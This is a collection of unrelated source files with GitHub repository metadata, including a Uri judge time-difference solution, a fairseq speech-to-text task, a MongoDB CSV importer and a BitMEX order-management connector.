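#     assert comp(inc, double)(3) == 7  # comp is the compose alias defined above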
| [
"[email protected]"
]
| |
c259f5026a586e6ea50ad764940a3a142ae65202 | c7f4387733c95ced53dae485f36618a88f18ea45 | /Uri/1061.py | 3e14cd823da4b724d092a9f5fbb6458bae7fd7b6 | []
| no_license | douradodev/Uri | 25d7636b5d5553fafdbd61a38d7c465c4cb79c0c | e879ebca7a87de674d69d739617c4207156ce349 | refs/heads/main | 2023-06-03T18:53:11.749866 | 2021-06-22T12:40:11 | 2021-06-22T12:40:11 | 379,264,919 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,080 | py | def main():
begin_day = input().split()
begin_time= input().split(' : ')
end_day = input().split()
end_time= input().split(' : ')
begin_time = int(begin_time[0]), int(begin_time[1]), int(begin_time[2])
end_time = int(end_time[0]), int(end_time[1]), int(end_time[2])
total_day = 0
total_time = [0,0,0]
total_day = int(end_day[1]) - int(begin_day[1])
if end_time[2] - begin_time[2] < 0:
total_time[2] = end_time[2] + 60 - begin_time[2]
dif_time = 1
else:
total_time[2] = end_time[2] - begin_time[2]
dif_time = 0
if (end_time[1] - dif_time) - begin_time[1] < 0:
total_time[1] = (end_time[1] - dif_time + 60) - begin_time[1]
dif_time = 1
else:
total_time[1] = (end_time[1] - dif_time) - begin_time[1]
dif_time = 0
if (end_time[0] - dif_time) - begin_time[0] < 0:
total_time[0] = (end_time[0] - dif_time + 24) - begin_time[0]
total_day -= 1
else:
total_time[0] = (end_time[0] - dif_time) - begin_time[0]
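    # Worked example (added; sample values assumed from the problem statement):
    # start = day 5, 08:12:23 and end = day 9, 06:13:23
    # seconds: 23 - 23 = 0; minutes: 13 - 12 = 1; hours: 6 - 8 < 0 -> 6 + 24 - 8 = 22 (borrow a day)
    # days: (9 - 5) - 1 = 3  ->  "3 dia(s), 22 hora(s), 1 minuto(s), 0 segundo(s)"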
print('{} dia(s)\n{} hora(s)\n{} minuto(s)\n{} segundo(s)'.format(total_day, total_time[0], total_time[1], total_time[2]))
main()
| [
"[email protected]"
]
| |
aa29aa9dd6c0b5f6833afd90f618c86c2bebc4b7 | 0386591b51fdbf5759faef6afb8729b64a3f1589 | /layerserver/widgets/creationuser.py | 0d14842f70435682d0eb6129fb35fbba132c0939 | [
"BSD-3-Clause"
]
| permissive | giscube/giscube-admin | 1e155402e094eb4db1f7ca260a8d1402e27a31df | 4ce285a6301f59a8e48ecf78d58ef83c3827b5e0 | refs/heads/main | 2023-07-11T17:23:56.531443 | 2023-02-06T15:12:31 | 2023-02-06T15:12:31 | 94,087,469 | 7 | 1 | BSD-3-Clause | 2023-07-07T13:22:09 | 2017-06-12T11:12:56 | Python | UTF-8 | Python | false | false | 371 | py | from .base import BaseWidget
class CreationUserWidget(BaseWidget):
base_type = 'string'
@staticmethod
def create(request, validated_data, widget):
validated_data[widget['name']] = request.user.username
@staticmethod
def is_valid(cleaned_data):
if not cleaned_data['readonly']:
return BaseWidget.ERROR_READONLY_REQUIRED
| [
"[email protected]"
]
| |
757ad5797b4182e0b1dc39f8fd424e66c7e6df6b | 23307f8e889f232724756bb26b1def1f0ba3323b | /fairseq/tasks/speech_to_text.py | 9388047a5e92e1c66236022de664b0480b9862be | []
| no_license | krisjeong/fairseq_data | 9395cb574d91147c95b6f08eecd814e4cb2fdad8 | f29e7dae3c2be3a908e795bfc952cc845b80280d | refs/heads/master | 2023-07-12T22:21:22.349970 | 2021-08-18T06:20:11 | 2021-08-18T06:20:11 | 397,152,122 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,214 | py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
import os.path as op
from argparse import Namespace
from fairseq.data import Dictionary, encoders
from fairseq.data.audio.speech_to_text_dataset import (
S2TDataConfig,
SpeechToTextDataset,
SpeechToTextDatasetCreator,
)
from fairseq.tasks import FairseqTask, register_task
logging.basicConfig(
format="%(asctime)s | %(levelname)s | %(name)s | %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
level=logging.INFO,
)
logger = logging.getLogger(__name__)
@register_task("speech_to_text")
class SpeechToTextTask(FairseqTask):
@staticmethod
def add_args(parser):
parser.add_argument("data", help="manifest root path")
parser.add_argument(
"--config-yaml",
type=str,
default="config.yaml",
help="Configuration YAML filename (under manifest root)",
)
parser.add_argument(
"--max-source-positions",
default=6000,
type=int,
metavar="N",
help="max number of tokens in the source sequence",
)
parser.add_argument(
"--max-target-positions",
default=1024,
type=int,
metavar="N",
help="max number of tokens in the target sequence",
)
def __init__(self, args, tgt_dict):
super().__init__(args)
self.tgt_dict = tgt_dict
self.data_cfg = S2TDataConfig(op.join(args.data, args.config_yaml))
@classmethod
def setup_task(cls, args, **kwargs):
data_cfg = S2TDataConfig(op.join(args.data, args.config_yaml))
dict_path = op.join(args.data, data_cfg.vocab_filename)
if not op.isfile(dict_path):
raise FileNotFoundError(f"Dict not found: {dict_path}")
tgt_dict = Dictionary.load(dict_path)
logger.info(
f"dictionary size ({data_cfg.vocab_filename}): " f"{len(tgt_dict):,}"
)
if getattr(args, "train_subset", None) is not None:
if not all(s.startswith("train") for s in args.train_subset.split(",")):
raise ValueError('Train splits should be named like "train*".')
return cls(args, tgt_dict)
def build_criterion(self, args):
from fairseq import criterions
if self.data_cfg.prepend_tgt_lang_tag and args.ignore_prefix_size != 1:
raise ValueError(
'Please set "--ignore-prefix-size 1" since '
"target language ID token is prepended as BOS."
)
return criterions.build_criterion(args, self)
def load_dataset(self, split, epoch=1, combine=False, **kwargs):
is_train_split = split.startswith("train")
pre_tokenizer = self.build_tokenizer(self.args)
bpe_tokenizer = self.build_bpe(self.args)
self.datasets[split] = SpeechToTextDatasetCreator.from_tsv(
self.args.data,
self.data_cfg,
split,
self.tgt_dict,
pre_tokenizer,
bpe_tokenizer,
is_train_split=is_train_split,
epoch=epoch,
seed=self.args.seed,
)
@property
def target_dictionary(self):
return self.tgt_dict
@property
def source_dictionary(self):
return None
def max_positions(self):
return self.args.max_source_positions, self.args.max_target_positions
def build_model(self, args):
args.input_feat_per_channel = self.data_cfg.input_feat_per_channel
args.input_channels = self.data_cfg.input_channels
return super(SpeechToTextTask, self).build_model(args)
def build_generator(
self,
models,
args,
seq_gen_cls=None,
extra_gen_cls_kwargs=None,
):
if self.data_cfg.prepend_tgt_lang_tag and args.prefix_size != 1:
raise ValueError(
'Please set "--prefix-size 1" since '
"target language ID token is prepended as BOS."
)
lang_token_ids = {
i
for s, i in self.tgt_dict.indices.items()
if SpeechToTextDataset.is_lang_tag(s)
}
extra_gen_cls_kwargs = {"symbols_to_strip_from_output": lang_token_ids}
return super().build_generator(
models, args, seq_gen_cls=None, extra_gen_cls_kwargs=extra_gen_cls_kwargs
)
def build_tokenizer(self, args):
logger.info(f"pre-tokenizer: {self.data_cfg.pre_tokenizer}")
return encoders.build_tokenizer(Namespace(**self.data_cfg.pre_tokenizer))
def build_bpe(self, args):
logger.info(f"tokenizer: {self.data_cfg.bpe_tokenizer}")
return encoders.build_bpe(Namespace(**self.data_cfg.bpe_tokenizer))
@classmethod
def build_dataset_for_inference(cls, audio_paths, n_frames):
return SpeechToTextDataset("interactive", False, {}, audio_paths, n_frames)
| [
"[email protected]"
]
| |
43c06f8278a5366020f9d1faef6d11fbe0df03ae | 82ebc6142f7044f8e908ffd6b2dc9e699191fd36 | /users/serializers.py | a7c000728c4688b5ce63c1f4c258ca68ee3a3d0d | []
| no_license | 32dantey/shopbuild | 4f775209e5b320364a8a845583c0d3c77f9844ee | 745b6cf73c8da52ed93b8bfe49055624dfa0aea2 | refs/heads/master | 2023-08-25T17:29:23.470994 | 2021-11-14T14:17:05 | 2021-11-14T14:17:05 | 427,917,564 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 225 | py | from django.contrib.auth.models import User
from rest_framework import serializers
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ['username', 'email', 'is_staff']
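# --- Added usage sketch (assumption, not in the original file) ---
#     user = User.objects.first()
#     UserSerializer(user).data
#     # -> {'username': 'alice', 'email': '[email protected]', 'is_staff': False}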
| [
"[email protected]"
]
| |
815579dd6d44ae403fc012a4f99d9bb8a607d842 | 4aec44fe50fa5c40f80c45bfb160d2fa7a98a0a9 | /students/jsward/lesson07/assignment/linear.py | f11fc105aa5a6d00df68e15542e76269dc162e4d | []
| no_license | UWPCE-PythonCert-ClassRepos/220-Advanced-Summer-2019 | 4e51fde79921e6e75f590bef223bc1b0f118ef41 | 6ffd7b4ab8346076d3b6cc02ca1ebca3bf028697 | refs/heads/master | 2022-12-13T01:22:01.063023 | 2019-09-22T10:21:37 | 2019-09-22T10:21:37 | 194,944,978 | 4 | 18 | null | 2022-12-08T01:22:40 | 2019-07-02T22:51:07 | HTML | UTF-8 | Python | false | false | 3,005 | py | # They are not, in fact, constants...
# pylint: disable=C0103
# pylint: disable=W0703
"""
Lesson 7: Linear
Relational concept Mongo DB equivalent
Database Database
Tables Collections
Rows Documents
Index Index
"""
import cProfile
import csv
import datetime
import logging
import sys
import time
from pymongo import MongoClient
from pymongo import errors as pymongo_errors
log_format = "%(asctime)s\t%(message)s"
formatter = logging.Formatter(log_format)
file_handler = logging.FileHandler("mongo_{}.log".format(datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")))
file_handler.setFormatter(formatter)
stream_handler = logging.StreamHandler(sys.stdout)
stream_handler.setFormatter(formatter)
logger = logging.getLogger(__name__)
logger.setLevel('INFO')
logger.addHandler(stream_handler)
logger.addHandler(file_handler)
mongo_client = MongoClient("mongodb://localhost:27017")
assignment_db = mongo_client["assignment"]
def import_data(data_dir, *files):
""" Imports data from file(s) to mongodb"""
list_of_tuples = []
for file_path in files:
processed = 0
collection_name = file_path.split(".")[0]
try:
count_prior = sum(1 for _ in assignment_db[collection_name].find())
except Exception:
logger.info("No existing records found in collection %s", collection_name)
count_prior = 0
with open("/".join([data_dir, file_path])) as file:
reader = csv.reader(file, delimiter=",")
header = False
start_time = time.time()
for row in reader:
if not header:
header = [h.strip("\ufeff") for h in row]
else:
data = {header[i]: v for i, v in enumerate(row)}
try:
assignment_db[collection_name].insert_one(data)
processed += 1
logger.debug("Inserted record %s into collection %s", data, collection_name)
except pymongo_errors.ServerSelectionTimeoutError as ex:
logger.error("Timeout or connection refused when connecting to MongoDB: %s", ex)
break
except Exception as ex:
logger.error("Error inserting record %s into table %s in MongoDB %s Error: %s",
data, assignment_db.name, mongo_client, ex)
continue
end_time = time.time()
list_of_tuples.append(tuple([processed, count_prior, (count_prior + processed), (end_time - start_time)]))
logger.info("Inserted %s records into collection %s in %s", processed, collection_name, (end_time - start_time))
logger.info("Collection now contains %s records", (count_prior + processed))
return list_of_tuples
if __name__ == "__main__":
import_data('data', 'customers.csv', 'products.csv')
# print(results)
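# --- Added alternative sketch (not part of the original file) ---
# insert_one() above costs one round-trip per row; pymongo's insert_many()
# batches documents and is usually much faster for bulk CSV loads. This reuses
# the module's globals and is a sketch, not a drop-in replacement:
#
#     def bulk_insert(collection_name, docs):
#         if docs:
#             assignment_db[collection_name].insert_many(docs, ordered=False)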
| [
"[email protected]"
]
| |
fe721a5d634410d1e7eae1f657adedf3d2a421f4 | c4c159a21d2f1ea0d7dfaa965aeff01c8ef70dce | /flask/flaskenv/Lib/site-packages/tensorflow/python/keras/preprocessing/image.py | f2a6b9eb3dcc6002673a3e3a13516299983498ad | []
| no_license | AhsonAslam/webapi | 54cf7466aac4685da1105f9fb84c686e38f92121 | 1b2bfa4614e7afdc57c9210b0674506ea70b20b5 | refs/heads/master | 2020-07-27T06:05:36.057953 | 2019-09-17T06:35:33 | 2019-09-17T06:35:33 | 208,895,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | version https://git-lfs.github.com/spec/v1
oid sha256:dd9edf94ef6b932c96aa6c9f40e3c19503ccfed4c5a10d0871bd11259eafd357
size 21747
| [
"github@cuba12345"
]
| github@cuba12345 |
bc99ce65235a3ffa79223116c532a78ee3ef3d86 | 4273f162abb12ef1939271c2aabee9547ac6afee | /studio_usd_pipe/resource/push/maya/uv/extractor_thumbnail.py | 8f6da8661609560730437f9504ee9bfc291638a7 | []
| no_license | xiyuhao/subins_tutorials | 2717c47aac0adde099432e5dfd231606bf45a266 | acbe4fe16483397e9b0f8e240ca23bdca652b92d | refs/heads/master | 2023-07-28T13:42:41.445399 | 2021-09-12T11:02:37 | 2021-09-12T11:02:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 876 | py | NAME = 'Extract UV Thumbnail'
ORDER = 1
VALID = True
TYPE = 'extractor'
KEY = 'uv_thumbnail'
OWNER = 'Subin Gopi'
COMMENTS = 'To create uv thumbnail file'
VERSION = '0.0.0'
MODIFIED = 'April 19, 2020'
def execute(output_path=None, **kwargs):
import os
from studio_usd_pipe.core import common
from studio_usd_pipe.utils import maya_asset
if not os.path.isfile(kwargs['thumbnail']):
return False, [kwargs['thumbnail']], 'not found input thumbnail!...'
ouput_image_path = os.path.join(
output_path,
'{}.png'.format(kwargs['caption'])
)
premission = common.data_exists(ouput_image_path, True)
if not premission:
return False, [ouput_image_path], 'not able to save thumbnail!...'
thumbnail = maya_asset.create_thumbnail(kwargs['thumbnail'], ouput_image_path)
return True, [thumbnail], 'success!...'
| [
"[email protected]"
]
| |
fa350fdb3e72dd4791fd8ec26ddfb37adacabbf3 | c84a3895e6fdcaff5a9f97abe9c3efbecbad535f | /trader/connector/bitmex/trader.py | 8a25600d285d7b0035c8a73b3cceaf9e557e151c | [
"LicenseRef-scancode-warranty-disclaimer"
]
| no_license | cal97g/siis | 5a171eb34dd3f7ae6e19d8065ff1e2f8b6251319 | adc06e48e5df6ffd7bed6ee6b79d0aa3cfe80e0d | refs/heads/master | 2020-07-23T18:11:57.267225 | 2019-09-05T01:00:37 | 2019-09-05T01:00:37 | 207,663,001 | 0 | 1 | null | 2019-09-10T21:05:25 | 2019-09-10T21:05:25 | null | UTF-8 | Python | false | false | 22,885 | py | # @date 2018-08-21
# @author Frederic SCHERMA
# @license Copyright (c) 2018 Dream Overflow
# Trader/autotrader connector for bitmex.com
import time
import base64
import uuid
import copy
import requests
from datetime import datetime
from notifier.notifiable import Notifiable
from notifier.signal import Signal
from trader.trader import Trader
from trader.market import Market
from .account import BitMexAccount
from trader.position import Position
from trader.order import Order
from connector.bitmex.connector import Connector
from config import config
import logging
logger = logging.getLogger('siis.trader.bitmex')
class BitMexTrader(Trader):
"""
BitMex real or testnet trader based on the BitMexWatcher.
@todo verify than on_order_updated is working without the temporary fixture now it has signal from watchers
"""
REST_OR_WS = False # True if REST API sync else do with the state returned by WS events
def __init__(self, service):
super().__init__("bitmex.com", service)
self._watcher = None
self._account = BitMexAccount(self)
self._last_position_update = 0
self._last_order_update = 0
def connect(self):
super().connect()
# retrieve the ig.com watcher and take its connector
self.lock()
self._watcher = self.service.watcher_service.watcher(self._name)
if self._watcher:
self.service.watcher_service.add_listener(self)
self.unlock()
if self._watcher and self._watcher.connected:
self.on_watcher_connected(self._watcher.name)
def disconnect(self):
super().disconnect()
self.lock()
if self._watcher:
self.service.watcher_service.remove_listener(self)
self._watcher = None
self.unlock()
def on_watcher_connected(self, watcher_name):
super().on_watcher_connected(watcher_name)
# markets, orders and positions
self.lock()
# fetch tradable markets
if '*' in self.configured_symbols():
# all symbols from the watcher
symbols = self._watcher.instruments
else:
# only configured symbols
symbols = self.configured_symbols()
for symbol in symbols:
self.market(symbol, True)
self.__fetch_orders()
self.__fetch_positions()
self.unlock()
# initial account update
self.account.update(self._watcher.connector)
def on_watcher_disconnected(self, watcher_name):
super().on_watcher_disconnected(watcher_name)
def market(self, market_id, force=False):
"""
Fetch from the watcher and cache it. It rarely changes so assume it once per connection.
@param force Force to update the cache
"""
market = self._markets.get(market_id)
if (market is None or force) and self._watcher is not None:
try:
market = self._watcher.fetch_market(market_id)
self._markets[market_id] = market
except Exception as e:
logger.error("fetch_market: %s" % repr(e))
return None
return market
@property
def authenticated(self):
return self.connected and self._watcher.connector.authenticated
@property
def connected(self):
return self._watcher is not None and self._watcher.connector is not None and self._watcher.connector.connected
def pre_update(self):
super().pre_update()
if self._watcher is None:
self.connect()
elif self._watcher.connector is None or not self._watcher.connector.connected:
# wait for the watcher be connected
retry = 0
while self._watcher.connector is None or not self._watcher.connector.connected:
retry += 1
if retry >= int(5 / 0.01):
self._watcher.connect()
# and wait 0.5 second to be connected
time.sleep(0.5)
# don't waste the CPU
time.sleep(0.01)
def update(self):
"""
Here we use the WS API so its only a simple sync we process here.
"""
if not super().update():
return False
if self._watcher is None or not self._watcher.connected:
return True
if BitMexTrader.REST_OR_WS:
# account data update
try:
self.lock()
self.__fetch_account()
except Exception as e:
import traceback
logger.error(traceback.format_exc())
finally:
self.unlock()
# positions
try:
self.lock()
self.__fetch_positions()
now = time.time()
self._last_update = now
except Exception as e:
import traceback
logger.error(traceback.format_exc())
finally:
self.unlock()
# orders
try:
self.lock()
self.__fetch_orders()
now = time.time()
self._last_update = now
except Exception as e:
import traceback
logger.error(traceback.format_exc())
finally:
self.unlock()
return True
def post_update(self):
super().post_update()
# don't wast the CPU 5 ms loop
time.sleep(0.005)
@Trader.mutexed
def create_order(self, order):
if not self.has_market(order.symbol):
logger.error("%s does not support market %s in order %s !" % (self.name, order.symbol, order.order_id))
return
if not self._activity:
return False
postdict = {
'symbol': order.symbol,
'clOrdID': order.ref_order_id,
}
qty = order.quantity
# short means negative quantity
if order.direction == Position.SHORT:
qty = -qty
exec_inst = []
# order type
# @todo Order.ORDER_STOP_LIMIT
if order.order_type == Order.ORDER_MARKET:
postdict['ordType'] = 'Market'
postdict['orderQty'] = qty
elif order.order_type == Order.ORDER_LIMIT:
postdict['ordType'] = 'Limit'
postdict['orderQty'] = qty
postdict['price'] = order.price
# only possible with limit order
if order.post_only:
exec_inst.append("ParticipateDoNotInitiate")
elif order.order_type == Order.ORDER_STOP:
postdict['ordType'] = 'Stop'
postdict['orderQty'] = qty
postdict['stopPx'] = order.stop_price
elif order.order_type == Order.ORDER_STOP_LIMIT:
postdict['ordType'] = 'StopLimit'
postdict['orderQty'] = qty
postdict['price'] = order.price
postdict['stopPx'] = order.stop_price
elif order.order_type == Order.ORDER_TAKE_PROFIT:
postdict['ordType'] = 'MarketIfTouched'
postdict['orderQty'] = qty
postdict['stopPx'] = order.stop_price
elif order.order_type == Order.ORDER_TAKE_PROFIT_LIMIT:
postdict['ordType'] = 'LimitIfTouched'
postdict['orderQty'] = qty
postdict['price'] = order.price
postdict['stopPx'] = order.stop_price
else:
postdict['ordType'] = 'Market'
postdict['orderQty'] = qty
# execution price
if order.price_type == Order.PRICE_LAST:
exec_inst.append('LastPrice')
elif order.price_type == Order.PRICE_INDEX:
exec_inst.append('IndexPrice')
elif order.price_type == Order.PRICE_MARK:
exec_inst.append('MarkPrice')
if order.reduce_only:
exec_inst.append("ReduceOnly")
# exec_inst.append("Close") # distinct for reduce only but close imply reduceOnly
# close implies a qty or a side
if exec_inst:
postdict['execInst'] = ','.join(exec_inst)
logger.info("Trader %s order %s %s @%s %s" % (self.name, order.direction_to_str(), order.symbol, order.price, order.quantity))
try:
result = self._watcher.connector.request(path="order", postdict=postdict, verb='POST', max_retries=15)
except Exception as e:
logger.error(str(e))
return False
if result and result.get('ordRejReason'):
logger.error("%s rejected order %s from %s %s - cause : %s !" % (
self.name, order.direction_to_str(), order.quantity, order.symbol, result['ordRejReason']))
return False
# store the order with its order id
order.set_order_id(result['orderID'])
order.created_time = self._parse_datetime(result.get('timestamp')).timestamp()
order.transact_time = self._parse_datetime(result.get('transactTime')).timestamp()
self._orders[order.order_id] = order
return True
@Trader.mutexed
def cancel_order(self, order_or_id):
# DELETE endpoint=order
if type(order_or_id) is str:
order = self._orders.get(order_or_id)
else:
order = order_or_id
if not self._activity:
return False
if order is None:
return False
order_id = order.order_id if order else order_or_id
symbol = order.symbol or ""
postdict = {
'orderID': order_id,
}
try:
result = self._watcher.connector.request(path="order", postdict=postdict, verb='DELETE', max_retries=15)
except requests.exceptions.HTTPError as e:
if e.response.status_code == 404:
# no longer exist, accepts as ok
return True
else:
logger.error(str(e))
return False
except Exception as e:
logger.error(str(e))
return False
# if result and result.get('ordRejReason'):
# logger.error("%s rejected cancel order %s from %s - cause : %s !" % (
# self.name, order_id, symbol, result['ordRejReason']))
# return False
return True
@Trader.mutexed
def close_position(self, position_id, market=True, limit_price=None):
if not self._activity:
return False
position = self._positions.get(position_id)
if position is None or not position.is_opened():
return False
if not self.has_market(position.symbol):
logger.error("%s does not support market %s on close position %s !" % (
self.name, position.symbol, position.position_id))
return False
ref_order_id = "siis_" + base64.b64encode(uuid.uuid4().bytes).decode('utf8').rstrip('=\n')
        order = Order(self, position.symbol)
        # keep the client reference id; it may be unused in this case but is harmless
        order.set_ref_order_id(ref_order_id)
order.set_position_id(position.position_id)
order.quantity = position.quantity
order.direction = -position.direction # neg direction
postdict = {
'symbol': order.symbol,
'clOrdID': ref_order_id,
'execInst': 'Close',
# 'execInst': 'ReduceOnly,Close' # @todo why rejected with ReduceOnly ?
}
        # short means negative quantity
        qty = order.quantity
        if order.direction == Position.SHORT:
            qty = -qty
# fully close (using Close and need 'side' when qty is not defined)
# qty = None
# order type
if market:
order.order_type = Order.ORDER_MARKET
postdict['ordType'] = "Market"
postdict['orderQty'] = qty
else:
order.order_type = Order.ORDER_LIMIT
order.price = limit_price
postdict['ordType'] = "Limit"
postdict['price'] = order.price
postdict['orderQty'] = qty
if qty is None:
postdict['side'] = "Buy" if order.direction > 0 else "Sell"
try:
result = self._watcher.connector.request(path="order", postdict=postdict, verb='POST', max_retries=15)
except Exception as e:
logger.error(str(e))
return False
if result and result.get('ordRejReason'):
logger.error("%s rejected closing order %s from %s %s - cause : %s !" % (
self.name, order.direction_to_str(), order.quantity, order.symbol, result['ordRejReason']))
return False
# store the order with its order id
order.set_order_id(result['orderID'])
# and store the order
self._orders[order.order_id] = order
# set position closing until we get confirmation on a next update
position.closing(limit_price)
return True
@Trader.mutexed
def modify_position(self, position_id, stop_loss_price=None, take_profit_price=None):
"""Not supported"""
return False
def positions(self, market_id):
self.lock()
position = self._positions.get(market_id)
if position:
positions = [copy.copy(position)]
else:
positions = []
self.unlock()
return positions
#
# slots
#
@Trader.mutexed
def on_order_updated(self, market_id, order_data, ref_order_id):
market = self._markets.get(order_data['symbol'])
if market is None:
# not interested by this market
return
try:
# @todo temporary substitution
self.__update_orders()
except Exception as e:
logger.error(repr(e))
#
# private
#
def _parse_datetime(self, date_str):
        return datetime.strptime(date_str or '1970-01-01T00:00:00.000Z', "%Y-%m-%dT%H:%M:%S.%fZ")
#
# protected
#
def __fetch_account(self):
# @todo use REST API to fetch account state
self._account.update(self._watcher.connector)
def __fetch_positions(self):
# @todo use REST API to fetch open positions
for symbol, market in self._markets.items():
return self.__update_positions(symbol, market)
def __fetch_orders(self):
# @todo use REST API to fetch open orders
return self.__update_orders()
def __update_positions(self, symbol, market):
if not self.connected:
return
# position for each configured market
for symbol, market in self._markets.items():
pos = self._watcher.connector.ws.position(symbol)
position = None
if self._positions.get(symbol):
position = self._positions.get(symbol)
elif pos['isOpen']:
# insert the new position
position = Position(self)
position.set_position_id(symbol)
position.set_key(self.service.gen_key())
quantity = abs(float(pos['currentQty']))
direction = Position.SHORT if pos['currentQty'] < 0 else Position.LONG
position.entry(direction, symbol, quantity)
position.leverage = pos['leverage']
position.entry_price = pos['avgEntryPrice']
position.created_time = datetime.strptime(pos['openingTimestamp'], "%Y-%m-%dT%H:%M:%S.%fZ").timestamp() # .%fZ")
# id is symbol
self._positions[symbol] = position
elif (not pos['isOpen'] or pos['currentQty'] == 0) and self._positions.get(symbol):
# no more position
del self._positions[symbol]
if position:
# absolute value because we work with positive quantity + direction information
position.quantity = abs(float(pos['currentQty']))
position.direction = Position.SHORT if pos['currentQty'] < 0 else Position.LONG
position.leverage = pos['leverage']
# position.market_close = pos['market_close']
position.entry_price = pos['avgEntryPrice']
position.created_time = datetime.strptime(pos['openingTimestamp'], "%Y-%m-%dT%H:%M:%S.%fZ").timestamp() # .%fZ")
# XBt to XBT
# ratio = 1.0
# if pos['currency'] == 'XBt':
# ratio = 1.0 / 100000000.0
# don't want them because they are in XBt or XBT
# position.profit_loss = (float(pos['unrealisedPnl']) * ratio)
# position.profit_loss_rate = float(pos['unrealisedPnlPcnt'])
# # must be updated using the market taker fee
# position.profit_loss_market = (float(pos['unrealisedPnl']) * ratio)
# position.profit_loss_market_rate = float(pos['unrealisedPnlPcnt'])
# compute profit loss in base currency
# @todo disabled for now util fix contract_size and value_per_pip calculation
# position.update_profit_loss(market)
def __update_orders(self):
if not self.connected:
return
# filters only siis managed orders
src_orders = self._watcher.connector.ws.open_orders("") # "siis_")
# first delete older orders
order_rm_list = []
for k, order in self._orders.items():
found = False
for src_order in src_orders:
src_order_id = src_order['clOrdID'] or src_order['orderID']
if order.order_id == src_order['clOrdID'] or order.order_id == src_order['orderID']:
found = True
break
if not found:
order_rm_list.append(order.order_id)
for order_id in order_rm_list:
del self._orders[order_id]
# insert or update active orders
for src_order in src_orders:
found = False
src_order_id = src_order['clOrdID'] or src_order['orderID']
order = self._orders.get(src_order_id)
if order is None:
# insert
order = Order(self, src_order['symbol'])
order.set_order_id(src_order_id)
self._orders[order.order_id] = order
else:
order = self._orders.get(src_order_id)
# logger.info(src_order)
# probably modifier or when leavesQty is update the ordStatus must change
# if src_order['ordStatus'] != "New":
# continue
# update
order.direction = Position.LONG if src_order['side'] == 'Buy' else Position.SHORT
# 'orderQty' (ordered qty), 'cumQty' (cumulative done), 'leavesQty' (remaning)
order.quantity = src_order.get('leavesQty', src_order.get('orderQty', 0))
if src_order.get('transactTime'):
order.transact_time = self._parse_datetime(src_order.get('transactTime')).timestamp()
if src_order['ordType'] == "Market":
order.order_type = Order.ORDER_MARKET
elif src_order['ordType'] == "Limit":
order.order_type = Order.ORDER_LIMIT
order.price = src_order.get('price')
elif src_order['ordType'] == "Stop":
order.order_type = Order.ORDER_STOP
order.stop_price = src_order.get('stopPx')
elif src_order['ordType'] == "StopLimit":
order.order_type = Order.ORDER_STOP_LIMIT
order.price = src_order.get('price')
order.stop_price = src_order.get('stopPx')
elif src_order['ordType'] == "MarketIfTouched":
order.order_type = Order.ORDER_TAKE_PROFIT
order.stop_price = src_order.get('stopPx')
elif src_order['ordType'] == "LimitIfTouched":
order.order_type = Order.ORDER_TAKE_PROFIT_LIMIT
order.price = src_order.get('price')
order.stop_price = src_order.get('stopPx')
if src_order['timeInForce'] == 'GoodTillCancel':
order.time_in_force = Order.TIME_IN_FORCE_GTC
elif src_order['timeInForce'] == 'ImmediateOrCancel':
order.time_in_force = Order.TIME_IN_FORCE_IOC
elif src_order['timeInForce'] == 'FillOrKill':
order.time_in_force = Order.TIME_IN_FORCE_FOK
else:
order.time_in_force = Order.TIME_IN_FORCE_GTC
# triggered, ordRejReason, currency
# @todo
# execution options
exec_inst = src_order['execInst'].split(',')
# taker or maker fee
if 'ParticipateDoNotInitiate' in exec_inst:
order.post_only = True
else:
order.post_only = False
# close reduce only
if 'Close' in exec_inst:
# close only order (must be used with reduce only, only reduce a position, and close opposites orders)
order.close_only = True
else:
order.close_only = False
# close reduce only
if 'ReduceOnly' in exec_inst:
# reduce only order (only reduce a position)
order.reduce_only = True
else:
                order.reduce_only = False
# execution price
if 'LastPrice' in exec_inst:
order.price_type = Order.PRICE_LAST
elif 'IndexPrice' in exec_inst:
order.price_type = Order.PRICE_MARK
elif 'MarkPrice' in exec_inst:
order.price_type = Order.PRICE_INDEX
# {'orderID': 'f1b0e6b1-3459-9fc8-d948-911d5032a521', 'clOrdID': '', 'clOrdLinkID': '', 'account': 513190, 'symbol': 'XBTUSD', 'side': 'Buy', 'simpleOrderQty': None,
# 'orderQty': 500, 'price': 7092.5, 'displayQty': None, 'stopPx': None, 'pegOffsetValue': None, 'pegPriceType': '', 'currency': 'USD', 'settlCurrency': 'XBt',
# 'ordType': 'Limit', 'timeInForce': 'GoodTillCancel', 'execInst': 'ParticipateDoNotInitiate', 'contingencyType': '', 'exDestination': 'XBME', 'ordStatus': 'New',
# 'triggered': '', 'workingIndicator': True, 'ordRejReason': '', 'simpleLeavesQty': 0.0705, 'leavesQty': 500, 'simpleCumQty': 0, 'cumQty': 0, 'avgPx': None,
# 'multiLegReportingType': 'SingleSecurity', 'text': 'Amended price: Amend from www.bitmex.com\nSubmission from www.bitmex.com', 'transactTime': '2018-09-01T21:09:09.688Z',
# 'timestamp': '2018-09-01T21:09:09.688Z'}
| [
"[email protected]"
]
| |
967dc456ae8754460e5768a8eb7b68d269bb5fd9 | d4bbbb07826fd11d071624761c3a452e431cec8f | /models/process_data.py | 398631223021b2ea0a47c8b791f81c6922aaaaa5 | [
"MIT"
]
| permissive | planetnest/epl-prediction | ecb88fb1b9fbea8d93637a547fb559b004f29bb7 | ffd4eb626d18829df49e07663ef74cd3735ca9d3 | refs/heads/master | 2021-07-06T19:07:14.132246 | 2017-09-27T23:45:15 | 2017-09-27T23:45:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,335 | py | import os.path
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from .preprocess import process_data
DATASET_DIR = '../datasets/'
DATA_FILES = ['epl-2015-2016.csv', 'epl-2016-2017.csv', 'epl-2017-2018.csv']
CURR_SEASON_DATA = os.path.join(DATASET_DIR, DATA_FILES[-1])
USELESS_ROWS = ['Referee', 'Div', 'Date', 'HomeTeam', 'AwayTeam']
def load_data():
dataset = pd.read_csv(CURR_SEASON_DATA)
dataset.drop(USELESS_ROWS, axis=1, inplace=True)
